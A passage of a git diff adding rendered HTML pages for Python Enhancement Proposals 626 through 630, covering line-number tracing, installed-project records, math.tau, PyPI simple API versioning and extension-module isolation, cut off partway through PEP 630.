+"line" 3       # pass
+"line" 1       # for
+"line" 4       # return
+"return" 1
+
+
+
+
+

The f_lineno attribute

+
    +
  • When a frame object is created, the f_lineno attribute will be set to the line +at which the function or class is defined; that is the line on which the def or class keyword appears. +For modules it will be set to zero.
  • +
  • The f_lineno attribute will be updated to match the line number about to be executed, +even if tracing is turned off and no event is generated.
  • +
+
+
+

The new co_lines() method of code objects

+

The co_lines() method will return an iterator which yields tuples of values, +each representing the line number of a range of bytecodes. Each tuple will consist of three values:

+
    +
  • start – The offset (inclusive) of the start of the bytecode range
  • +
  • end – The offset (exclusive) of the end of the bytecode range
  • +
  • line – The line number, or None if the bytecodes in the given range do not have a line number.
  • +
+

The sequence generated will have the following properties:

+
    +
  • The first range in the sequence with have a start of 0
  • +
  • The (start, end) ranges will be non-decreasing and consecutive. +That is, for any pair of tuples the start of the second +will equal to the end of the first.
  • +
  • No range will be backwards, that is end >= start for all triples.
  • +
  • The final range in the sequence with have end equal to the size of the bytecode.
  • +
  • line will either be a positive integer, or None
  • +
+
+

Zero width ranges

+

Zero width range, that is ranges where start == end are allowed. +Zero width ranges are used for lines that are present in the source code, +but have been eliminated by the bytecode compiler.

+
+
+
+

The co_linetable attribute

+

The co_linetable attribute will hold the line number information. +The format is opaque, unspecified and may be changed without notice. +The attribute is public only to support creation of new code objects.

+
+
+

The co_lnotab attribute

+

Historically the co_lnotab attribute held a mapping from bytecode offset to line number, but does not support bytecodes without a line number. +For backward compatibility, the co_lnotab bytes object will be lazily created when needed. +For ranges of bytecodes without a line number, the line number of the previous bytecode range will be used.

+

Tools that parse the co_lnotab table should move to using the new co_lines() method as soon as is practical.

+
+
+
+

Backwards Compatibility

+

The co_lnotab attribute will be deprecated in 3.10 and removed in 3.12.

+

Any tools that parse the co_lnotab attribute of code objects will need to move to using co_lines() before 3.12 is released. +Tools that use sys.settrace will be unaffected, except in cases where the “line” events they receive are more accurate.

+
+

Examples of code for which the sequence of trace events will change

+

In the following examples, events are listed as “name”, f_lineno pairs.

+
+

pass statement in an if statement.

+
0.  def spam(a):
+1.      if a:
+2.          eggs()
+3.      else:
+4.          pass
+
+
+

If a is True, then the sequence of events generated by Python 3.9 is:

+
"line" 1
+"line" 2
+"line" 4
+"return" 4
+
+
+

From 3.10 the sequence will be:

+
"line" 1
+"line" 2
+"return" 2
+
+
+
+
+

Multiple pass statements.

+
0.  def bar():
+1.      pass
+2.      pass
+3.      pass
+
+
+

The sequence of events generated by Python 3.9 is:

+
"line" 3
+"return" 3
+
+
+

From 3.10 the sequence will be:

+
"line" 1
+"line" 2
+"line" 3
+"return" 3
+
+
+
+
+
+

C API

+

Access to the f_lineno attribute of frame objects through C API functions is unchanged. +f_lineno can be read by PyFrame_GetLineNumber. f_lineno can only be set via PyObject_SetAttr and similar functions.

+

Accessing f_lineno directly through the underlying data structure is forbidden.

+
+
+

Out of process debuggers and profilers

+

Out of process tools, such as py-spy [1], cannot use the C-API, and must parse the line number table themselves. +Although the line number table format may change without warning, +it will not change during a release unless absolutely necessary for a bug fix.

+

To reduce the work required to implement these tools, the following C struct and utility functions are provided. +Note that these functions are not part of the C-API, so will be need to be linked into any code that needs to use them.

+
typedef struct addressrange {
+    int ar_start;
+    int ar_end;
+    int ar_line;
+    struct _opaque opaque;
+} PyCodeAddressRange;
+
+void PyLineTable_InitAddressRange(char *linetable, Py_ssize_t length, int firstlineno, PyCodeAddressRange *range);
+int PyLineTable_NextAddressRange(PyCodeAddressRange *range);
+int PyLineTable_PreviousAddressRange(PyCodeAddressRange *range);
+
+
+

PyLineTable_InitAddressRange initializes the PyCodeAddressRange struct from the line number table and first line number.

+

PyLineTable_NextAddressRange advances the range to the next entry, returning non-zero if valid.

+

PyLineTable_PreviousAddressRange retreats the range to the previous entry, returning non-zero if valid.

+
+

Note

+

The data in linetable is immutable, but its lifetime depends on its code object. +For reliable operation, linetable should be copied into a local buffer before calling PyLineTable_InitAddressRange.

+
+

Although these functions are not part of C-API, they will provided by all future versions of CPython. +The PyLineTable_ functions do not call into the C-API, so can be safely copied into any tool that needs to use them. +The PyCodeAddressRange struct will not be changed, but the _opaque struct is not part of the specification and may change.

+
+

Note

+

The PyCodeAddressRange struct has changed from the original version of this PEP, where the addition fields were defined, but +were liable to change.

+
+

For example, the following code prints out all the address ranges:

+
void print_address_ranges(char *linetable, Py_ssize_t length, int firstlineno)
+{
+    PyCodeAddressRange range;
+    PyLineTable_InitAddressRange(linetable, length, firstlineno, &range);
+    while (PyLineTable_NextAddressRange(&range)) {
+        printf("Bytecodes from %d (inclusive) to %d (exclusive) ",
+               range.start, range.end);
+        if (range.line < 0) {
+            /* line < 0 means no line number */
+            printf("have no line number\n");
+        }
+        else {
+            printf("have line number %d\n", range.line);
+        }
+    }
+}
+
+
+
+
+
+

Performance Implications

+

In general, there should be no change in performance. +When tracing, programs should run a little faster as the new table format can be designed with line number calculation speed in mind. +Code with long sequences of pass statements will probably become a bit slower.

+
+
+

Reference Implementation

+

https://github.com/markshannon/cpython/tree/new-linetable-format-version-2

+
+ +
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0626.rst

+

Last modified: 2024-08-20 10:29:32 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0627/index.html b/pep-0627/index.html new file mode 100644 index 00000000000..d945a42b808 --- /dev/null +++ b/pep-0627/index.html @@ -0,0 +1,351 @@ + + + + + + + + PEP 627 – Recording installed projects | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 627 – Recording installed projects

+
+
Author:
+
Petr Viktorin <encukou at gmail.com>
+
BDFL-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
15-Jul-2020
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Recording installed projects, is maintained on the PyPA specs page.

+

×

+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

This PEP clarifies and updates PEP 376 (Database of Installed Python +Distributions), rewriting it as an interoperability standard. +It moves the canonical location of the standard to the Python +Packaging Authority (PyPA) standards repository, and sets up guidelines +for changing it.

+

Two files in installed .dist-info directories are made optional: +RECORD (which PEP 376 lists as mandatory, but suggests it can be left out +for “system packages”), and INSTALLER.

+
+
+

Motivation

+

Python packaging is moving from relying on specific tools (Setuptools and pip) +toward an ecosystem of tools and tool-agnostic interoperability standards.

+

PEP 376 is not written as an interoperability standard. +It describes implementation details of specific tools and libraries, +and is underspecified, leaving much room for implementation-defined behavior.

+

This is a proposal to “distill” the standard from PEP 376, clarify it, +and rewrite it to be tool-agnostic.

+

The aim of this PEP is to have a better standard, not necessarily a perfect one. +Some issues are left to later clarification.

+
+
+

Rationale Change

+

PEP 376’s rationale focuses on two problems:

+
    +
  • There are too many ways to install projects and this makes interoperation difficult.
  • +
  • There is no API to get information on installed distributions.
  • +
+

The new document focuses only the on-disk format of information about +installed projects. +Providing API to install, uninstall or query this information is left to +be implemented by tools.

+
+
+

Standard and Changes Process

+

The canonical standard for Recording installed projects (previously known as +Database of Installed Python Distributions) is the documentation at +packaging.python.org. +Any changes to the document (except trivial language or typography fixes) must +be made through the PEP process.

+

The document is normative (with examples to aid understanding). +PEPs that change it, such as this one, contain additional information that is +expected to get out of date, such as rationales and compatibility +considerations.

+

The proposed standard is submitted together with this PEP as a pull request to +packaging.python.org.

+
+
+

Changes and their Rationale

+
+

Renaming to “Recording installed projects”

+

The standard is renamed from Database of Installed Python Distributions +to Recording installed projects.

+

While putting files in known locations on disk may be thought of as +a “database”, it’s not what most people think about when they hear the term. +The PyPA links to PEP 376 under the heading Recording installed distributions.

+

The PyPA glossary defines “Distribution” (or, “Distribution Package” to prevent +confusion with e.g. Linux distributions) as “A versioned archive file […]”. +Since there may be other ways to install Python code than from archive files, +the document uses “installed project” rather than “installed distribution”.

+
+
+

Removal of Implementation Details

+

All tool- and library-specific details are removed. +The mechanisms of how a project is installed are also left out: the document +focuses on the end state. +One exception is a sketch of an uninstallation algorithm, +which is given to better explain the purpose of the RECORD file.

+

References to .egg-info and .egg, +formats specific to setuptools and distutils, +are left out.

+
+
+

Explicitly Allowing Additional Files

+

The .dist-info directory is allowed to contain files not specified in +the spec. +The current tools already do this.

+

A note in the specification mentions files in the .dist-info directory of wheels. +Current tools copy these files to the installed .dist-info—something +to keep in mind for further standardization efforts.

+
+
+

Clarifications in the RECORD File

+

The CSV dialect is specified to be the default of Python’s csv module. +This resolves edge cases around handling double-quotes and line terminators +in file names.

+

The “base” of relative paths in RECORD is specified relative to the +.dist-info directory, rather than tool-specific --install-lib and +--prefix options.

+

Both hash and size fields are now optional (for any file, not just +.pyc, .pyo and RECORD). Leavng them out is discouraged, +except for *.pyc and RECORD itself. +(Note that PEP 376 is unclear on what was optional; when taken literally, +its text and examples contradict. Despite that, “both fields are optional“ is a +reasonable interpretation of PEP 376. +The alternative would be to mandate—rather than recommend—which files can be +recorded without hash and size, and to update that list over time as new use +cases come up.)

+

The new spec explicitly says that the RECORD file must now include all +files of the installed project (the exception for .pyc files remains). +Since tools use RECORD for uninstallation, incomplete file lists could +introduce orphaned files to users’ environments. +On the other hand, this means that there is no way to record hashes of some +any files if the full list of files is unknown.

+

A sketch of an uninstallation algorithm is included to clarify the file’s +primary purpose and contents.

+

Tools must not uninstall/remove projects that lack a RECORD file +(unless they have external information, such as in system package +managers of Linux distros).

+

On Windows, files in RECORD may be separated by either / or \. +PEP 376 was unclear on this: it mandates forward slashes in one place, but +shows backslackes in a Windows-specific example.

+
+
+

Optional RECORD File

+

The RECORD file is made optional. +Not all tools can easily generate a list of installed files in a +Python-specific format.

+

Specifically, the RECORD file is unnecessary when projects are installed +by a Linux system packaging system, which has its own ways to keep track of +files, uninstall them or check their integrity. +Having to keep a RECORD file in sync with the disk and the system package +database would be unreasonably fragile, and no RECORD file is better +than one that does not correspond to reality.

+

(Full disclosure: The author of this PEP is an RPM packager active in the Fedora Linux distro.)

+
+
+

Optional INSTALLER File

+

The INSTALLER file is also made optional, and specified to be used for +informational purposes only. +It is still a single-line text file containing the name of the installer.

+

This file was originally added to distinguish projects installed by the Python +installer (pip) from ones installed by other package managers +(e.g. dnf). +There were attempts to use this file to prevent pip from updating or +uninstalling packages it didn’t install.

+

Our goal is supporting interoperating tools, and basing any action on +which tool happened to install a package runs counter to that goal.

+

Instead of relying on the installer name, tools should use feature detection. +The current document offers a crude way of making a project untouchable by +Python tooling: omitting RECORD file.

+

On the other hand, the installer name may be useful in hints to the user.

+

To align with this new purpose of the file, the new specification allows +any ASCII string in INSTALLER, rather than a lowercase identifier. +It also suggests using the command-line command, if available.

+
+
+

The REQUESTED File: Removed from Spec

+

The REQUESTED file is now considered a tool-specific extension.

+

Per PEP 376, REQUESTED was to be written when a project was installed +by direct user request, as opposed to automatically to satisfy dependencies +of another project. Projects without this marker file could be uninstalled +when no longer needed.

+

Despite the standard, many existing installers (including older versions of +pip) never write this file. There is no distinction between projects +that are “OK to remove when no longer needed” and ones simply installed by +a tool that ignores REQUESTED. So, the file is currently not usable for its +intended purpose (unless a tool can use additional, non-standard information).

+
+
+

Clarifications

+

When possible, terms (such as name and version) are qualified by +references to existing specs.

+
+
+
+

Deferred Ideas

+

To limit the scope of this PEP, some improvements are explicitly left to +future PEPs:

+
    +
  • Encoding of the RECORD file
  • +
  • Limiting or namespacing files that can appear in .dist-info
  • +
  • Marking the difference between projects installed directly by user request +versus those installed to satisfy dependencies, so that the latter can be +removed when no longer needed.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0627.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0628/index.html b/pep-0628/index.html new file mode 100644 index 00000000000..6b07f866204 --- /dev/null +++ b/pep-0628/index.html @@ -0,0 +1,184 @@ + + + + + + + + PEP 628 – Add math.tau | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 628 – Add math.tau

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
28-Jun-2011
+
Python-Version:
+
3.6
+
Post-History:
+
28-Jun-2011
+
+
+
+
Table of Contents +
+
+

Abstract

+

In honour of Tau Day 2011, this PEP proposes the addition of the circle +constant math.tau to the Python standard library.

+

The concept of tau (τ) is based on the observation that the ratio of a +circle’s circumference to its radius is far more fundamental and interesting +than the ratio between its circumference and diameter. It is simply a matter +of assigning a name to the value 2 * pi ().

+
+
+

PEP Acceptance

+

This PEP is now accepted and math.tau will be a part of Python 3.6. +Happy birthday Alyssa!

+

The idea in this PEP has been implemented in the auspiciously named +issue 12345.

+
+
+

The Rationale for Tau

+

pi is defined as the ratio of a circle’s circumference to its diameter. +However, a circle is defined by its centre point and its radius. This is +shown clearly when we note that the parameter of integration to go from a +circle’s circumference to its area is the radius, not the diameter. If we +use the diameter instead we have to divide by four to get rid of the +extraneous multiplier.

+

When working with radians, it is trivial to convert any given fraction of a +circle to a value in radians in terms of tau. A quarter circle is +tau/4, a half circle is tau/2, seven 25ths is 7*tau/25, etc. In +contrast with the equivalent expressions in terms of pi (pi/2, pi, +14*pi/25), the unnecessary and needlessly confusing multiplication by +two is gone.

+
+
+

Other Resources

+

I’ve barely skimmed the surface of the many examples put forward to point out +just how much easier and more sensible many aspects of mathematics become +when conceived in terms of tau rather than pi. If you don’t find my +specific examples sufficiently persuasive, here are some more resources that +may be of interest:

+
    +
  • Michael Hartl is the primary instigator of Tau Day in his Tau Manifesto
  • +
  • Bob Palais, the author of the original mathematics journal article +highlighting the problems with pi has a page of resources on the +topic
  • +
  • For those that prefer videos to written text, Pi is wrong! and +Pi is (still) wrong are available on YouTube
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0628.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0629/index.html b/pep-0629/index.html new file mode 100644 index 00000000000..51676510b62 --- /dev/null +++ b/pep-0629/index.html @@ -0,0 +1,255 @@ + + + + + + + + PEP 629 – Versioning PyPI’s Simple API | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 629 – Versioning PyPI’s Simple API

+
+
Author:
+
Donald Stufft <donald at stufft.io>
+
BDFL-Delegate:
+
Brett Cannon <brett at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
16-Jul-2020
+
Post-History:
+
16-Jul-2020
+
+
+
+
Table of Contents +
+
+

Note

+

This PEP was +accepted on 2020-08-20. +PyPI merged an implementation +on 2020-01-28, marking this PEP as “Final”.

+
+
+

Abstract

+

This PEP proposes adding a method for versioning the simple API so +that clients can determine which features of the simple API that a +specific repository supports.

+
+
+

Rationale

+

When evolving the simple API, clients wish to be able to determine +which features the repository supports. Currently there is no +mechanism to do this, except by attempting to detect new features +by looking at the data in the responses and see if it appears like +a particular feature is in use.

+

This works reasonably well for a modern version of a client to determine +if the repository supports all of the features it wants to implement, +however it does not do anything to tell an older version the client that +the repository supports features that it might not understand and to +allow messaging to indicate that it might not be correctly understanding +the output of the repository.

+

An example of a scenario where this happened was the phasing in of +python-requires metadata, while existing clients could still successfully +use the repository, they were lacking the ability to understand this new +piece of data which would have informed their behavior to select a better +file for end users.

+
+
+

Overview

+

This PEP proposes the inclusion of a meta tag on the responses of every +successful request to a simple API page, which contains a name attribute +of “pypi:repository-version”, and a content that is a PEP 440 compatible +version number, which is further constrained to ONLY be Major.Minor, and +none of the additional features supported by PEP 440.

+

This would end up looking like:

+
<meta name="pypi:repository-version" content="1.0">
+
+
+

When interpreting the repository version:

+
    +
  • Incrementing the major version is used to signal a backwards +incompatible change such that existing clients would no longer be +expected to be able to meaningfully use the API.
  • +
  • Incrementing the minor version is used to signal a backwards +compatible change such that existing clients would still be +expected to be able to meaningfully use the API.
  • +
+

It is left up to the discretion of any future PEPs as to what +specifically constitutes a backwards incompatible vs compatible change +beyond the broad suggestion that existing clients will be able to +“meaningfully” continue to use the API, and can include adding, +modifying, or removing existing features.

+

It is expectation of this PEP that the major version will never be +incremented, and any future major API evolutions would utilize a +different mechanism for API evolution. However the major version +is included to disambiguate with future versions (e.g. a hypothetical +simple api v2 that lived at /v2/, but which would be confusing if the +repository-version was set to a version >= 2).

+

This PEP sets the current API version to “1.0”, and expects that +future PEPs that further evolve the simple API will increment the +minor version number.

+
+

Clients

+

Clients interacting with the simple API SHOULD introspect each +response for the repository version, and if that data does not exist +MUST assume that it is version 1.0.

+

When encountering a major version greater than expected, clients +MUST hard fail with an appropriate error message for the user.

+

When encountering a minor version greater than expected, clients +SHOULD warn users with an appropriate message.

+

Clients MAY still continue to use feature detection in order to +determine what features a repository uses.

+
+
+
+

Rejected Ideas

+
+

Using a Header

+

Instead of baking this information into the actual HTML, an +alternative would be to use a HTTP header. This idea was +considered and ultimately was rejected because it would make +mirrors have to start modifying headers instead of being able +to operate as a “dumb” HTTP server of files.

+
+
+

Using an URL

+

Another traditional mechanism for versioning APIs is to bake it +into the URL, something like /1.0/simple/ or so. This works +well for major version changes where olders clients are not +expected to be capable of continuing to use it, but it is not +well suited to minor version bumps, particularly when the version +numbers can be viewed as largely advisory for end users.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0629.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0630/index.html b/pep-0630/index.html new file mode 100644 index 00000000000..e3f8b12bd8d --- /dev/null +++ b/pep-0630/index.html @@ -0,0 +1,713 @@ + + + + + + + + PEP 630 – Isolating Extension Modules | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 630 – Isolating Extension Modules

+
+
Author:
+
Petr Viktorin <encukou at gmail.com>
+
Discussions-To:
+
Capi-SIG list
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
25-Aug-2020
+
Post-History:
+
16-Jul-2020
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Isolating Extension Modules HOWTO.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

Traditionally, state belonging to Python extension modules was kept in C +static variables, which have process-wide scope. This document +describes problems of such per-process state and efforts to make +per-module state—a better default—possible and easy to use.

+

The document also describes how to switch to per-module state where +possible. This transition involves allocating space for that state, potentially +switching from static types to heap types, and—perhaps most +importantly—accessing per-module state from code.

+
+
+

About This Document

+

As an informational PEP, +this document does not introduce any changes; those should be done in +their own PEPs (or issues, if small enough). Rather, it covers the +motivation behind an effort that spans multiple releases, and instructs +early adopters on how to use the finished features.

+

Once support is reasonably complete, this content can be moved to Python’s +documentation as a HOWTO. +Meanwhile, in the spirit of documentation-driven development, +gaps identified in this PEP can show where to focus the effort, +and it can be updated as new features are implemented.

+

Whenever this PEP mentions extension modules, the advice also +applies to built-in modules.

+
+

Note

+

This PEP contains generic advice. When following it, always take into +account the specifics of your project.

+

For example, while much of this advice applies to the C parts of +Python’s standard library, the PEP does not factor in stdlib specifics +(unusual backward compatibility issues, access to private API, etc.).

+
+

PEPs related to this effort are:

+
    +
  • PEP 384Defining a Stable ABI, which added a C API for creating +heap types
  • +
  • PEP 489Multi-phase extension module initialization
  • +
  • PEP 573Module State Access from C Extension Methods
  • +
+

This document is concerned with Python’s public C API, which is not +offered by all implementations of Python. However, nothing in this PEP is +specific to CPython.

+

As with any Informational PEP, this text does not necessarily represent +a Python community consensus or recommendation.

+
+
+

Motivation

+

An interpreter is the context in which Python code runs. It contains +configuration (e.g. the import path) and runtime state (e.g. the set of +imported modules).

+

Python supports running multiple interpreters in one process. There are +two cases to think about—users may run interpreters:

+
    +
  • in sequence, with several Py_InitializeEx/Py_FinalizeEx +cycles, and
  • +
  • in parallel, managing “sub-interpreters” using +Py_NewInterpreter/Py_EndInterpreter.
  • +
+

Both cases (and combinations of them) would be most useful when +embedding Python within a library. Libraries generally shouldn’t make +assumptions about the application that uses them, which includes +assuming a process-wide “main Python interpreter”.

+

Currently, CPython doesn’t handle this use case well. Many extension +modules (and even some stdlib modules) use per-process global state, +because C static variables are extremely easy to use. Thus, data +that should be specific to an interpreter ends up being shared between +interpreters. Unless the extension developer is careful, it is very easy +to introduce edge cases that lead to crashes when a module is loaded in +more than one interpreter in the same process.

+

Unfortunately, per-interpreter state is not easy to achieve—extension +authors tend to not keep multiple interpreters in mind when developing, +and it is currently cumbersome to test the behavior.

+
+
+

Rationale for Per-module State

+

Instead of focusing on per-interpreter state, Python’s C API is evolving +to better support the more granular per-module state. By default, +C-level data will be attached to a module object. Each interpreter +will then create its own module object, keeping the data separate. For +testing the isolation, multiple module objects corresponding to a single +extension can even be loaded in a single interpreter.

+

Per-module state provides an easy way to think about lifetime and +resource ownership: the extension module will initialize when a +module object is created, and clean up when it’s freed. In this regard, +a module is just like any other PyObject *; there are no “on +interpreter shutdown” hooks to think—or forget—about.

+
+

Goal: Easy-to-Use Module State

+

It is currently cumbersome or impossible to do everything the C API +offers while keeping modules isolated. Enabled by PEP 384, changes in +PEP 489 and PEP 573 (and future planned ones) aim to first make it +possible to build modules this way, and then to make it easy to +write new modules this way and to convert old ones, so that it can +become a natural default.

+

Even if per-module state becomes the default, there will be use cases +for different levels of encapsulation: per-process, per-interpreter, +per-thread or per-task state. The goal is to treat these as exceptional +cases: they should be possible, but extension authors will need to +think more carefully about them.

+
+
+

Non-goals: Speedups and the GIL

+

There is some effort to speed up CPython on multi-core CPUs by making the GIL +per-interpreter. While isolating interpreters helps that effort, +defaulting to per-module state will be beneficial even if no speedup is +achieved, as it makes supporting multiple interpreters safer by default.

+
+
+
+

Making Modules Safe with Multiple Interpreters

+

There are many ways to correctly support multiple interpreters in +extension modules. The rest of this text describes the preferred way to +write such a module, or to convert an existing one.

+

Note that support is a work in progress; the API for some features your +module needs might not yet be ready.

+

A full example module is available as +xxlimited.

+

This section assumes that “you” are an extension module author.

+
+

Isolated Module Objects

+

The key point to keep in mind when developing an extension module is +that several module objects can be created from a single shared library. +For example:

+
>>> import sys
+>>> import binascii
+>>> old_binascii = binascii
+>>> del sys.modules['binascii']
+>>> import binascii  # create a new module object
+>>> old_binascii == binascii
+False
+
+
+

As a rule of thumb, the two modules should be completely independent. +All objects and state specific to the module should be encapsulated +within the module object, not shared with other module objects, and +cleaned up when the module object is deallocated. Exceptions are +possible (see Managing Global State), but they will need more +thought and attention to edge cases than code that follows this rule of +thumb.

+

While some modules could do with less stringent restrictions, isolated +modules make it easier to set clear expectations (and guidelines) that +work across a variety of use cases.

+
+
+

Surprising Edge Cases

+

Note that isolated modules do create some surprising edge cases. Most +notably, each module object will typically not share its classes and +exceptions with other similar modules. Continuing from the +example above, +note that old_binascii.Error and binascii.Error are +separate objects. In the following code, the exception is not caught:

+
>>> old_binascii.Error == binascii.Error
+False
+>>> try:
+...     old_binascii.unhexlify(b'qwertyuiop')
+... except binascii.Error:
+...     print('boo')
+...
+Traceback (most recent call last):
+  File "<stdin>", line 2, in <module>
+binascii.Error: Non-hexadecimal digit found
+
+
+

This is expected. Notice that pure-Python modules behave the same way: +it is a part of how Python works.

+

The goal is to make extension modules safe at the C level, not to make +hacks behave intuitively. Mutating sys.modules “manually” counts +as a hack.

+
+
+

Managing Global State

+

Sometimes, state of a Python module is not specific to that module, but +to the entire process (or something else “more global” than a module). +For example:

+
    +
  • The readline module manages the terminal.
  • +
  • A module running on a circuit board wants to control the on-board +LED.
  • +
+

In these cases, the Python module should provide access to the global +state, rather than own it. If possible, write the module so that +multiple copies of it can access the state independently (along with +other libraries, whether for Python or other languages).

+

If that is not possible, consider explicit locking.

+

If it is necessary to use process-global state, the simplest way to +avoid issues with multiple interpreters is to explicitly prevent a +module from being loaded more than once per process—see +Opt-Out: Limiting to One Module Object per Process.

+
+
+

Managing Per-Module State

+

To use per-module state, use multi-phase extension module initialization +introduced in PEP 489. This signals that your module supports multiple +interpreters correctly.

+

Set PyModuleDef.m_size to a positive number to request that many +bytes of storage local to the module. Usually, this will be set to the +size of some module-specific struct, which can store all of the +module’s C-level state. In particular, it is where you should put +pointers to classes (including exceptions, but excluding static types) +and settings (e.g. csv’s field_size_limit) +which the C code needs to function.

+
+

Note

+

Another option is to store state in the module’s __dict__, +but you must avoid crashing when users modify __dict__ from +Python code. This means error- and type-checking at the C level, +which is easy to get wrong and hard to test sufficiently.

+
+

If the module state includes PyObject pointers, the module object +must hold references to those objects and implement the module-level hooks +m_traverse, m_clear and m_free. These work like +tp_traverse, tp_clear and tp_free of a class. Adding them will +require some work and make the code longer; this is the price for +modules which can be unloaded cleanly.

+

An example of a module with per-module state is currently available as +xxlimited; +example module initialization shown at the bottom of the file.

+
+
+

Opt-Out: Limiting to One Module Object per Process

+

A non-negative PyModuleDef.m_size signals that a module supports +multiple interpreters correctly. If this is not yet the case for your +module, you can explicitly make your module loadable only once per +process. For example:

+
static int loaded = 0;
+
+static int
+exec_module(PyObject* module)
+{
+    if (loaded) {
+        PyErr_SetString(PyExc_ImportError,
+                        "cannot load module more than once per process");
+        return -1;
+    }
+    loaded = 1;
+    // ... rest of initialization
+}
+
+
+
+
+

Module State Access from Functions

+

Accessing the state from module-level functions is straightforward. +Functions get the module object as their first argument; for extracting +the state, you can use PyModule_GetState:

+
static PyObject *
+func(PyObject *module, PyObject *args)
+{
+    my_struct *state = (my_struct*)PyModule_GetState(module);
+    if (state == NULL) {
+        return NULL;
+    }
+    // ... rest of logic
+}
+
+
+
+

Note

+

PyModule_GetState may return NULL without setting an +exception if there is no module state, i.e. PyModuleDef.m_size was +zero. In your own module, you’re in control of m_size, so this is +easy to prevent.

+
+
+
+
+

Heap Types

+

Traditionally, types defined in C code are static; that is, +static PyTypeObject structures defined directly in code and +initialized using PyType_Ready().

+

Such types are necessarily shared across the process. Sharing them +between module objects requires paying attention to any state they own +or access. To limit the possible issues, static types are immutable at +the Python level: for example, you can’t set str.myattribute = 123.

+
+

Note

+

Sharing truly immutable objects between interpreters is fine, +as long as they don’t provide access to mutable objects. +However, in CPython, every Python object has a mutable implementation +detail: the reference count. Changes to the refcount are guarded by the GIL. +Thus, code that shares any Python objects across interpreters implicitly +depends on CPython’s current, process-wide GIL.

+
+

Because they are immutable and process-global, static types cannot access +“their” module state. +If any method of such a type requires access to module state, +the type must be converted to a heap-allocated type, or heap type +for short. These correspond more closely to classes created by Python’s +class statement.

+

For new modules, using heap types by default is a good rule of thumb.

+

Static types can be converted to heap types, but note that +the heap type API was not designed for “lossless” conversion +from static types – that is, creating a type that works exactly like a given +static type. Unlike static types, heap type objects are mutable by default. +Also, when rewriting the class definition in a new API, +you are likely to unintentionally change a few details (e.g. pickle-ability +or inherited slots). Always test the details that are important to you.

+
+

Defining Heap Types

+

Heap types can be created by filling a PyType_Spec structure, a +description or “blueprint” of a class, and calling +PyType_FromModuleAndSpec() to construct a new class object.

+
+

Note

+

Other functions, like PyType_FromSpec(), can also create +heap types, but PyType_FromModuleAndSpec() associates the module +with the class, allowing access to the module state from methods.

+
+

The class should generally be stored in both the module state (for +safe access from C) and the module’s __dict__ (for access from +Python code).

+
+
+

Garbage Collection Protocol

+

Instances of heap types hold a reference to their type. +This ensures that the type isn’t destroyed before all its instances are, +but may result in reference cycles that need to be broken by the +garbage collector.

+

To avoid memory leaks, instances of heap types must implement the +garbage collection protocol. +That is, heap types should:

+
    +
  • Have the Py_TPFLAGS_HAVE_GC flag.
  • +
  • Define a traverse function using Py_tp_traverse, which +visits the type (e.g. using Py_VISIT(Py_TYPE(self));).
  • +
+

Please refer to the documentation of Py_TPFLAGS_HAVE_GC and +tp_traverse +<https://docs.python.org/3/c-api/typeobj.html#c.PyTypeObject.tp_traverse> +for additional considerations.

+

If your traverse function delegates to the tp_traverse of its base class +(or another type), ensure that Py_TYPE(self) is visited only once. +Note that only heap type are expected to visit the type in tp_traverse.

+

For example, if your traverse function includes:

+
base->tp_traverse(self, visit, arg)
+
+
+

…and base may be a static type, then it should also include:

+
if (base->tp_flags & Py_TPFLAGS_HEAPTYPE) {
+    // a heap type's tp_traverse already visited Py_TYPE(self)
+} else {
+    Py_VISIT(Py_TYPE(self));
+}
+
+
+

It is not necessary to handle the type’s reference count in tp_new +and tp_clear.

+
+
+

Module State Access from Classes

+

If you have a type object defined with PyType_FromModuleAndSpec(), +you can call PyType_GetModule to get the associated module, and then +PyModule_GetState to get the module’s state.

+

To save a some tedious error-handling boilerplate code, you can combine +these two steps with PyType_GetModuleState, resulting in:

+
my_struct *state = (my_struct*)PyType_GetModuleState(type);
+if (state === NULL) {
+    return NULL;
+}
+
+
+
+
+

Module State Access from Regular Methods

+

Accessing the module-level state from methods of a class is somewhat more +complicated, but is possible thanks to the changes introduced in PEP 573. +To get the state, you need to first get the defining class, and then +get the module state from it.

+

